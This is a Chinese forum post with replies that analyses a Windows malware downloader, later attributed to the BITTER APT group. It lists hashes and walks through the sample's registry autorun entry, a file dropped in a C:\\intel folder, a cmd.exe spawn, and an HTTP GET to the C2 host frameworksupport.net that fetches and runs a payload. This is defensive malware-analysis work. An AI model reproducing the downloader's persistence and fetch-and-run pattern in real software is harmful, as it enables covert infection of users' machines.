首页
论坛
专栏
课程

[原创]对病毒的一次详细分析

2019-7-15 16:34 2842

[原创]对病毒的一次详细分析

2019-7-15 16:34
2842

好久没分析病毒了,今天偶然中发现个病毒,以前也有大佬分析过,在这里我分享一下我的成果。

1. 样本信息

病毒名称:Update Required Case Enq No 192_2018.docx.com

MD5:8fdc51fa4c14267026810f8b70e61418

SHA1: 5b0899709b4f0c8a076d04ad72e1a87133615f2e

SHA256: 8dd9a89571cbeba93c5839f355e56389d104499f0232f063fba4e40408ca5d4b

2. 环境及测试工具

环境:Windows 7 32位操作系统

查壳工具:PEID、ExeinfoPE

二进制:010Editor

调试工具:OD、IDApro

3. 简单分析

1.     查壳



这里我们可以看到Not packed,也就是没有壳。

2.     云沙箱分析

这里我们可以看到它添加了注册表项,实现了自启动;创建了一个文件夹,生成了一个可执行文件,并且创建了一个进程,这些信息都是我们详细分析的时候需要注意的。

3. 详细分析

我们将文件放入IDA中观察,可以看到下图所示。

从这里整体上来看,他是创建了一个窗口,并且显示/隐藏了它,病毒一般都是隐藏窗口啦,接着我们看第一个函数,也就是sub_401140,如下图所示。

这个一看就很明白,这个就是创建窗口的一些参数嘛!那个sub_4011D0不出意外的话就是窗口回调了,为了证实这一点,让我们进去看看,下图就是sub_4011D0函数的内部


从回调来看,他并没有执行什么恶意操作,让我们回到主函数,继续往下看。


这里也就是隐藏更新窗口的操作,所以我们把重点放在sub_401330这个函数上面,当进去以后我们会发现这个函数不简单,里面有很大一坨…让我们一点一点的分析吧,首先第一个关键点如下图所示


它在C盘创建了一个文件夹,让我们继续往后看,后面的代码静态分析会有点困难,所以在这里我教大家一个好方法,OD和IDA 双剑合并。



打开IDA创建一个map文件



接着打开OD的插件,加载map文件你就会发现一些函数已经被标好了名字如下图所示,这样我们看起来会轻松很多。



接下来,我发现了一个不好的一个现象,这个程序是有随机基址的,如下图所示。



这样会对我们分析造成一点的阻碍,所以这里我去掉了随机基址,熟悉PE文件的都知道,所以这里我修改了下图的位置。



在进入程序的时候我们就可以看到已经没有随机基址了。



下面我们开始IDA和OD配合进行分析,

在这里我们可以看到,它确实是隐藏了窗口。




还有作者的一些花指令



我们可以找到刚才IDA静态分析的地方,让我们继续看下一个函数也就是sub_403B00这个函数,我们通过动态分析看到了下图注册表相关的东西



看到这个注册表我们就应该想到,他应该是有开机自启的功能,让我们继续往下看。



在这里我们可以看到它生成了一个msdtcv.exe放在了自己创建的intel文件夹下。





这里是它是在开机后就开启AppId,到这里sub_403B00我们就分析完毕,至于AppId是什么我们继续往下看



进入sub_401F00我们可以看到下图



在这里我们了解到原来上一个函数的AppId是这里的注册表。



继续往下看,发现这里创建了一个线程,还有启动msdtcv.exe,让我们看看,线程里到底干了些什么



在线程里他创建了一个cmd.exe,并写入了命令,具体可以看下图



我们继续往下看发现了WSAStartup这个函数,我们知道了他是存在网络操作的,对于这个我们已经很熟悉了。



继续往下看sub_402890,在这里我们可以看到它利用网络发送了一些数据



根据以前的经验,我们可以知道inet_addr也就是IP地址,htons就是端口;hostname就是:frameworksupport.net




继续往下看,我们可以看到它发送的请求



文件的内容如下,图片看的可能不太清楚,具体的报文:“GET /ergdfbd/ HTTP/1.1 Host: frameworksupport,net Connection:Close”



保存下载的文件然后执行

由于已经接收不到后续的文件,所以这个病毒到此就分析结束了。

总结

这个病毒其中涉及到一些花指令,一定程度上阻碍了分析的进度,但是这个花指令还可以分析起来不是特别的恶心,后面还有一些加密,也不是特别困难。

分析完了这个病毒后我想到了两种解决方案

1.     关闭80端口(不推荐)

2.     对C盘进行文件夹监控,如果有未授权的文件夹创建就进行提示,是否允许(推荐)



[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

最后于 2019-7-15 16:38 被一谷米粒编辑 ,原因:
最新回复 (11)
叁毛 1 2019-7-15 16:46
2
0
这个云沙箱是啥玩意?
花剌子模 1 2019-7-15 17:54
3
0
bitter group.鉴定完毕.
剁辣椒炒肉 2019-7-15 18:08
4
0
点赞,要是能再解析一下加密就更棒了,要是有抓包分析就更更棒了
一谷米粒 2019-7-15 19:37
5
0
叁毛 这个云沙箱是啥玩意?
这个云沙箱用的是360云沙箱。。。
kxzpy 2019-7-16 05:22
6
0
图咋都挂了,看不到啊
kalikaikai 1 2019-7-16 08:44
7
0
想看后续接收的文件,前面只是一个下载器而已啊
CrazymanArmy 2 2019-7-17 09:44
8
0

阅读完表哥写的文章 写得不错,继续努力
这个样本是BITTER(蔓灵花)团伙攻击巴基斯坦的样本
时间大约在2019-01-25左右
如果表哥不介意可以看看我写的报告:
记一次蔓灵花APT组织针对巴基斯坦定向攻击的样本分析
这个下载器会将C2回传的数据存入如下地址:
1
但是这个C2已经失效了,但是你可以看看微步的报告
【微步在线报告】“蔓灵花”团伙发起新一轮攻击活动
这里面涉及的C2以及样本hash还是比较齐全的
希望我的回复能给你帮助

一谷米粒 2019-7-17 12:51
9
0

最后于 2019-7-17 12:51 被一谷米粒编辑 ,原因:
一谷米粒 2019-7-17 12:53
10
0
CrazymanArmy 阅读完表哥写的文章 写得不错,继续努力 这个样本是`BITTER`(蔓灵花)团伙攻击巴基斯坦的样本 时间大约在2019-01-25左右 如果表哥不介意可以看看我写的报告: [记一次蔓灵花APT ...
非常感谢大哥的指点,让我对这个病毒有了更全面的了解。
最后我想请教一下大哥,在哪里可以获得最新的APT组织的攻击样本?
CrazymanArmy 2 2019-7-17 18:05
11
0
一谷米粒 非常感谢大哥的指点,让我对这个病毒有了更全面的了解。 最后我想请教一下大哥,在哪里可以获得最新的APT组织的攻击样本?
你可以关注关注Dalao的推特
那边样本还是很及时的
以及在VT上架设yara规则匹配也是可以匹配到一些不改变TTP的样本
包括Anyrun也不错
mb_omqyxbij 2019-7-24 21:39
12
0
能帮我分析一个?
游客
登录 | 注册 方可回帖
返回